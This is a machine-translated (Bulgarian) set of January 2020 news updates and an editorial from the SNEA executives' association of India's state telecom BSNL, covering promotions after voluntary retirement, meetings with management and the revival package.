Промоции в сценария след VRS и необходимостта от редовна промоция вместо споразумения за наблюдение: Ние решително протестирахме срещу хода за предоставяне на споразумение за грижа вместо редовна промоция. Позициите почти DGM(T/Fin) и степени AGM/CAO/EE ще станат свободни след VRS на 31.01.2020 г. и трябва да се предприемат незабавни действия за повишение, настояхме ние. Тъй като голям брой ръководители с достатъчен опит работят в по-високи мащаби, те могат просто да бъдат повишени чрез промяна на предназначението, посочихме. По подобен начин хиляди JTO в различни крила вече са в по-високи мащаби и могат да бъдат повишени чрез преназначаване. Дори DPC не се изисква. Споразумението в Лос Анджелис е против интересите на ръководителите, тъй като те губят услугата и бъдещите промоционални пътища. Ръководството прави години заедно в Ел Ей и отрича редовни повишения. Ние поискахме спиране на този механизъм и осигуряване на редовни повишения за всички отговарящи на условията ръководители.

на DGM промоции,SNEA обясни срещата със секретаря, DoT на 01.01.2020 г. и неговото положително решение, позволяващо промоции на DGM. Дори DoT получи повишение до ниво Sr DDG (CGM) на 30.12.2019 г. за тези, които се пенсионират на 31.12.2019 г., но BSNL не предприема никакви действия, за да даде повишение на свободните длъжности преди тяхното пенсиониране. След обсъждане DIR(HR) увери, че ще обсъди със секретаря/DoT и CMD/BSNL и ще направи необходимото за промоциите на DGM.

Реверсията на 2001 Rect JTO премина през LDCE -2007: Отново се проведе дискусия по въпроса и Assn обясни тяхната допустимост с позоваване на SDE RR клауза 12, бележка 5 и разясненията, издадени през 2007 г. относно тяхната допустимост да се появят в LDCE-2007. Сега някои от тях са върнати на базата на разясненията, издадени през 2012 г. за LDCE 2010. Издадените разяснения относно допустимостта за участие в LDCE 2007 и LDCE 2010 са напълно различни и това усложни проблема. Допустимостта трябва да бъде решена въз основа на разясненията, издадени за LDCE 2007, поискахме. Тъй като те вече са станали SDE, те не можаха да напишат последващите DCE, проведени през 2012 и 2015 г. Сред тях също, някои SDE на TN Circle са изправени пред връщане, докато други се обслужват само като показват известие за причина. Ние поискахме да спрем процеса на връщане, докато въпросът не бъде решен въз основа на фактите, представени на ръководството. Предложихме да се направи комисия, която да разгледа въпроса. Накрая DIR(HR) нареди на съответните служители да донесат всички свързани файлове на следващия ден, за да вземат подходящо решение.

10-01-2020

10-01-2020

10-01-2020

Среща с Shri P. K. Purwar, CMD BSNL на 10.01.2020 г.: Генералните секретари и AGS на AIBSNLEA и SNEA се срещнаха днес с CMD BSNL и проведоха дискусии по следните въпроси:

DGM(T) Промоции:Относно повишенията от DET към DGM (T), ние обяснихме за срещата със секретаря (T) DoT на 01 януари и 03 януари 2020 г., в която секретарят (T) се съгласи за повишенията за DGM (T), при условие че е без създаване на допълнителни финансови последици. CMD BSNL информира, че той също е обсъдил със секретаря (T) в това отношение и се опитва да направи необходимото.

Изчистване на висящи задължения за възстановявания от заплати на служителите: CMD информира, че изплащането на възстановяванията на GPF по отношение на участниците в VRS, около Rs.710 Crore, ще бъде освободено в понеделник. Други такси също ще бъдат изчистени най-рано.

Промоции за заемане на свободни позиции след VRS: По отношение на повишенията, CMD е на мнение, че служителите трябва да забравят повишенията поне за една година и да работят усилено за възраждането на BSNL. Също така изрази мнение, че в бъдеще трябва да бъдат въведени повече заслуги в повишенията. Обяснихме основните реалности. Почти всички длъжности на DGM в Telecom & Finance Wings, както и длъжности на AGM и CAO ще станат свободни след 31.01.2020 г. и след това ще стане трудно да се управлява BSNL без незабавно запълване на тези свободни позиции. Има стагнация в кадрите на JTO и SDE и техните повишения не търпят отлагане. По време на набиране на JTO и JAO, както и при повишения от JTO до SDE, състезателният изпит е наличен и на практика 50% отговарящи на изискванията ръководители по време на повишението са само от конкурентна квота, обяснихме ние. CMD BSNL се съгласи относно недостига на длъжности на AGM, CAO и DGM след VRS 2019 г.

Сбогом на пенсиониращите се служители: Като признание за услугите на пенсионерите, ние поискахме да възстановим сумата от 3001 рупии/- тъй като това е просто знак на признателност за техните минали услуги в BSNL и чест за тях. CMD съобщи за неспособността си поради финансовата криза в BSNL. В такъв случай предложихме някакво алтернативно споразумение като купони за презареждане, равни на тази сума. CMD оцени нашето предложение и се съгласи да разгледа алтернативата вместо парична награда.

Разпределяне на проекти на USOF към BSNL въз основа на номинация: Ние оценихме CMD BSNL по отношение на разпределението на проекти на USOF към BSNL въз основа на номинация. CMD BSNL спомена, че трябва да направим всички Govt. Проекти/ Проекти на USOF и нашето представяне през предходните години беше много добро и ние завършихме Govt. Проекти в рамките на срока. Въпреки това смятаме, че ако се даде на базата на номинация, ще бъде добре за BSNL, в противен случай, ако се състезаваме чрез търг, може да не е от полза за BSNL.

Поддръжка на първични кабели: Освен това оценихме CMD относно трудностите, пред които са изправени ръководителите и различните кръгове в сценария след VRS при поддържането на първичните кабели, тъй като заповедите за поддръжка на първичния кабел за възлагане на външни изпълнители не са издадени от Корпоративния офис. CMD BSNL спомена, че поради работата по разработката, която се извършва в различни щати, първичният кабел трябва да се сменя/поддържа често, като се вземе разрешение от различни местни държавни органи. Органи/магистрални органи, за които участникът в търга може да не се яви и работата ни по поддръжката ще бъде сериозно засегната.

Поддръжка на MDF:Призовахме CMD BSNL контролът върху MDF да бъде в рамките на персонала на BSNL. CMD BSNL спомена, че нашият млад персонал трябва да излезе напред, да вземе важната работа и да поеме отговорност. Освен това CMD спомена, че поради недостиг на персонал в сценария след VRS може да не е възможно MDF да се поддържа денонощно от персонала на BSNL. След подробно обсъждане CMD уверява, че ще преразгледа ситуацията след три месеца.

08-01-2020

08-01-2020

SNEA изразява солидарност и морална подкрепа към общата стачка на централните профсъюзи на 01.08.2020 г. срещу приватизацията на публичния сектор и други искания

07-01-2020

07-01-2020

Срещата на Изпълнителния комитет на Circle на Assam Circle се проведе в Гувахати на 01/04/2020. GS и Jt Sec(East) се обърнаха към разширеното заседание на ЦИК. Ръководителите на CHQ си припомниха приноса на висшите ръководители и активистите, взети от ВРС. Те ръководят Сдружението по време на различни борби за решаване на различни искания и техният принос ще се помни завинаги. Всички задължения ще бъдат уредени до 31.01.2020 г. и раздялата им с BSNL ще бъде гладка.

В крайна сметка нашата борба от години заедно донесе добри резултати за BSNL. Ръководството и правителството се опитаха да потиснат нашата борба с много средства, чрез намаляване на заплатите, обвинителни листове, показване на известия за причините и т.н. и т.н., но ние никога не направихме компромис. Най-накрая нашата борба извади 4G спектър безплатно, както изисквахме, монетизацията на земята беше одобрена, всички разходи за VRS бяха поети от правителството, облигация от 8500 Cr със суверенна гаранция, одобрена за предоставяне на финансова подкрепа и т.н.

Нашият основен фокус е върху възраждането на BSNL. Пускането на 4G е планирано за 01.03.2020 г. Тарифата се увеличава, което е добър знак за индустрията и BSNL. Ако ръководството е в състояние да приложи добър механизъм, който да вдъхне доверие на служителите, Възраждането е много възможно. Всичко зависи от ръководството.

На корпоративно ниво се извършва преструктуриране на BSNL. В променения сценарий се издават насоки за възлагане на CFA работа на външни изпълнители. Въпреки това се страхуваме, че поради строгите условия може да се провали на много места и BSNL ще има големи проблеми с поддържането на услугите след 01.02.2020 г., информирахме ръководството. Опитните работници може да не могат да участват в търга. Подобна работа се извършва и в други вертикали.

Както се страхуваме, във вертикала на човешките ресурси броят на длъжностите намалява драстично чрез преструктуриране. VRS хвърля различни предизвикателства и намаляването на длъжността и повишението е едно от тях. Заплахата от съкращаване на длъжности съществуваше в продължение на много години и в очакване на това Асоциацията разработи политика за повишение, която не се основава на длъжности, много предварително. Сега целият ни фокус е върху ранното му внедряване след крайната дата 01.07.2018 г.

За съжаление, някои изпълнителни Assn все още изискват базирани на длъжност повишение от бъдеща дата(за малко свободни позиции) и подпомагане на ръководството да спре прилагането на новата политика за повишение. Ръководството не дава повишение на базата на длъжност в името на презрение и преструктуриране и в същото време не прилага новата политика. Всички отговарят на условията за промоция от 01.07.18, но те настояват за промоция от бъдеща дата! Възможността, която получихме миналата година за промоция на SDE за всички постове на SDE, разглезени от тях от непреклонното отношение към петицията за неуважение и изискването за лично явяване на CMD и GM(Pers) в CAT/Ernakulam.

Новата промоция ще бъде от полза за всички ръководители, осигурявайки плавно напредване в кариерата до степен на AGM. Всички JTO до 2014 г. могат да станат SDE и всички SDE до 2016 г. могат да станат Sr SDE/Sr AO или AGM/CAO от сега. Теглото за минал трудов стаж е предвидено в новата политика. По този начин повишението от SDE/AO в Sr SDE/Sr AO степен ще бъде след 3 години и повишението от SDE/AO в AGM/CAO след 8 години, което не може да се мечтае при променения сценарий. След ВРС броят на длъжностите във всички кадри ще намалее драстично.

Чрез продължителна борба и непрекъснато убеждаване бихме могли да уредим много проблеми в миналото. През 2018 г. бихме могли да дадем рекорден брой промоции, нечувани никога в историята на BSNL или DoT. Конкретни проблеми на директните служители на BSNL, като i) вноска на EPF без тавана, ii) 5% пенсионно обезщетение и т.н., могат да бъдат разрешени. Ще продължим усилията си за разрешаване на оставащите проблеми с подкрепата на всички.

06-01-2020

Срещата на Изпълнителния комитет на Circle на Assam Circle се проведе в Гувахати на 01/04/2020. GS и Jt Sec (East) присъстваха и се обърнаха към срещата. ЦИК единодушно кооптира следните носители на Circle Office:

Президент на кръга: Com Suresh Bora, AGM.

Секретар на кръга: Com Borun Baruah, JTO.

Ковчежник: Com Allauddin Ahmed, AO.

Сътрудничеството стана необходимо, тъй като по-ранните OB избраха VRS 2019. SNEA признава техния принос в продължение на много години и им желае всичко най-добро.

SNEA CHQ пожелава успех на новоизбрания млад екип.

03-01-2020

Преглед на медийни репортажи:

Контролираната от държавата компания Bharat Sanchar Nigam Limited (BSNL) продължава да бъде на ниво след бюрократичната несигурност, водеща до ерозия на потенциалните възможности за приходи на фона на мега програми за свързаност на стойност 20 000 крори рупии, въпреки стремежа на Центъра да съживи стресирания телеком .

03-01-2020

03-01-2020

Взаимодействие с консултанта M/s Deloitte:

Ръководството на BSNL организира среща с консултанта M/s Deloitte, назначен за даване на препоръки за приемственост в услугите на BSNL в сценария на пост VRS и краткосрочните мерки на 01.02.2020 г.

GS, президентът и двамата AGS проведоха подробна дискусия с консултанта за около два часа от 1600 часа до 1800 часа, като се фокусираха върху всички проблеми, които могат да възникнат в сценария след VRS. Консултантът идентифицира остър недостиг на кадри на DGM, AGM и TT(TM), който ще окаже влияние след VRS.

Дискусиите бяха фокусирани върху реалностите на земята в полевите единици, как това ще се отрази след VRS, незабавни мерки, които трябва да бъдат предприети за намаляване на въздействието, връзка с клиентите в сценария след VRS, сливане на SSA и Circle, недостатък на настоящата структура на BA, работна сила изискване, мотивация на персонала и др.

02-01-2020

02-01-2020

GS, президент и AGS се срещнаха със секретаря/DoT, Member(T)/DoT, Addl Secretary/DoT, CMD, DIR(HR), DIR(Fin), Jt Sec/DoT и други старши служители на DoT на 01.01.2020 г. , новата година и кратки дискусии. Дискусиите с CMD и DIR(HR) по важни въпроси като преструктуриране и повишение са определени за следващата седмица поради натоварения им график.

По време на срещата със секретаря/DoT ние повдигнахме въпроса за повишението в DGM(T), което е спряно поради отговора, даден от секретаря/DoT на срещата с парламентарната комисия, че повишението в DGM може да бъде издадено само след приключване на преструктурирането (т.е. след VRS). Обяснихме, че всички отговарящи на условията DE получават повишение и няма резерви, включени в промоцията от DE към DGM и всичките 287 DE принадлежат към категорията SC/ST, която също се покрива. Сред DE повече от 500 DE са кандидатствали за VRS и ще пропуснат промоцията, ако бъдат издадени след 31.01.2020 г. Освен това го информираме, че на 30.12.2019 г. дори офицерите с ранг на CGM, които се пенсионират на 31.12.2019 г., получават повишение и им е позволено да се възползват от повишението. Но в случая с ръководителите на BSNL се случва точно обратното.

След обсъждане секретарят информира, че е съгласен с повишението на DGM, при условие че: 1) няма никакви финансови последици точно преди VRS и 2) несъздавайте проблеми в подобни рамки. Обяснихме, че това няма никакви финансови последици и всички работят в по-високи мащаби и няма да създадат проблем в подобни кадри, тъй като повишението на DGM е задържано след 2017 г. поради съдебни спорове.

Тогава секретарят ни увери, че ще обсъдим с CMD и ако информацията е вярна, той ще даде разрешение за повишение на DGM.

01-01-2020

01-01-2020

редакция

2019: Турбулентен период в историята на BSNL. Ние успешно го преодоляваме с безпрецедентно единство и солидарност

Нова година разгръща нови надежди с нови предизвикателства

През 2019 г. преминахме през бурни времена, невиждани в историята на BSNL с агитации едно след друго с искане за Възраждане на BSNL. За служителите на BSNL това наистина беше битка за смърт или смърт. Всеки един ангажиран член на SNEA посвети цялата една година за възраждането на BSNL, тъй като всеки правилно мислещ изпълнителен директор на BSNL беше наясно с факта, че бъдещето му зависи изцяло от бъдещето на BSNL. За съжаление по време на този критичен период също някои части от служителите, особено някои ръководители, се държаха далеч от основните борби, сякаш колапсът на BSNL няма нищо общо с тях. Те трябва да осъзнаят грешките и да се присъединят към основния поток, в противен случай ръководителите трябва да приемат призива да укрепят основния поток, оставяйки тези негативни сили.

Да, бяхме свидетели на репресивни мерки, отприщени от ръководството и правителството срещу асоциациите и съюзите, за да ги принудят да спрат вълненията и борбите, позволявайки на BSNL естествената му смърт чрез приемане на поражението. Но ние никога не отстъпихме, тъй като бяхме направени от различни неща, готови на всякакви жертви и готови да се борим докрай, докато постигнем целта си. Да, това беше битка за всички ни, която трябва да спечелим на всяка цена.

Първоначално правителството изобщо не беше сериозно за възраждането на BSNL. Всички министерства се противопоставиха на Плана за възраждане. Правителството чакаше естествената смърт на BSNL. Министерството на финансите беше толкова враждебно, противопоставяйки се на всякакъв вид пакет за Възраждане и настоявайки за затварянето на BSNL и MTNL. Борбата, рамо до рамо с успешните усилия на служителите на BSNL да създадат обществено и медийно мнение в полза на BSNL Revival, наистина направи чудеса. SNEA беше в челните редици на всички подобни дейности. Създадената от нас принуда за политическа намеса най-накрая проработи. Искрените усилия на Hon MoC и неговите усилия да сформира правителството на Ма с министъра на вътрешните работи като негов председател, съчетано с искрените усилия на двамата секретари/DoT и двамата CMDs/BSNL направиха нещата да се случат. Нашите усилия за намесата на уважаемия министър-председател и последният призив от самия уважаем министър-председател да дадем добър пакет за възраждане, който наистина ще помогне за възраждането на BSNL, беше най-решаващият фактор.

Най-накрая пакетът за съживяване на BSNL и MTNL беше одобрен от кабинета на Съюза на 23.10.2019 г., давайки нов живот на BSNL и MTNL. Пакетът има реален потенциал за възраждането на BSNL. Таксите за 4G спектър от 14 155 крори Rs плюс 18% GST ще бъдат поети от правителството, както изискваме от нас. От самото начало AUAB поиска правителството да предостави безплатни 4G честоти на BSNL. Монетизацията на земята за изчистване на задълженията и покриване на CAPEX също получи одобрението на кабинета. Искането ни за финансова помощ също се материализира под формата на дългосрочна облигация от 10 години за 15 000 Cr за BSNL и MTNL с държавна гаранция от правителството. Нашата загриженост за сливането на MTNL с BSNL, т.е. огромните финансови задължения, статута му на листвана компания и сложните въпроси, свързани с човешките ресурси, се решават преди сливането да се осъществи. Цялата отговорност от около 15 000 Crores за VRS се поема от правителството, тъй като ние се противопоставяхме на всяка допълнителна финансова тежест върху BSNL от името на VRS. Разпределянето на 5G спектър е друго предпочитано решение в бъдеще.

Всеки служител на BSNL, особено другарите от SNEA, може да се похвали с това прекрасно постижение, създавайки друга история в синдикалното движение. Да, другари, създадохме история, борейки се рамо до рамо с други служители, за възраждането на компанията, давайки пример на други сектори. Много съм горд и щастлив да бъда част от такава борба и да ръководя Асоциация от ангажирани членове, като оглавявам борбата под знамето на БЗНС в най-трудния период. Това са запомнящите се моменти в живота.

Сега сме на прага на 2020 г. с много надежди и очаквания. Търсим положителност в BSNL. Възраждането на BSNL е първото сред тях.

Стартирането на 4G на основата на Пан Индия на разпределения спектър не трябва да се отлага. Клиентите чакат с нетърпение този момент. По същия начин BSNL отговаря пред правителството и след разпределянето на безплатен 4G спектър. Предстои ускорена модернизация на мрежата. Оперативните проблеми и изчистването на дължимите задължения към труда, изпълнителите, доставчиците, собствениците на земя и т.н. са непосредствените предизвикателства, за да направите всеки аутсорсинг модел успешен. BSNL трябва да си възвърне доверието сред тях, като изчисти задълженията си, които ще се отворят пътятза бъдещето. Реализиране на парите чрез държавни облигации и монетизация на земята са две важни мерки в тази посока. Ръководството трябва да излезе от синдрома на VRS и да започне да работи по тези проблеми, за да се увери, че BSNL ще продължи да предоставя услуги без прекъсване след 31.01.2020 г. Голям брой лоялни клиенти са наистина притеснени от масовото доброволно пенсиониране и е наша отговорност да възвърнем доверието им в сценария след VRS. В това отношение управленските решения ще бъдат много важни.

В допълнение към горните проблеми, как ръководството ще мотивира останалите 47% служители да поемат цялото работно натоварване в ситуацията след VRS, как те запълват вакуума, създаден в полевите звена, които генерират приходи и т.н., ще има огромно значение влияние върху усилията за възраждане на БСНЛ. Недостигът на ръководители на по-високо ниво може лесно да бъде посрещнат чрез повишение, което може да стане в рамките на няколко дни според новата политика, просто като вземете VC.

Не могат да се извиняват повече от ръководството на Министерството на транспорта/Правителството и BSNL в името на разходите за служители, тъй като повече от 50% служители са взели VRS, надхвърляйки целта си. Вече предупредихме ръководството, че непрофесионалното и драстично намаляване на силата на изпълнителния директор ще има неблагоприятно въздействие върху възраждането на BSNL и добрите работници трябва да бъдат задържани в BSNL. Всичко зависи от начина, по който ръководството използва останалите служители изгодно в сценария след VRS. Професионалният подход и бързите политически решения могат отново да върнат BSNL на правилния път.

Да се ​​надяваме, че 2020 г. ще донесе добри новини за BSNL и цялата нация.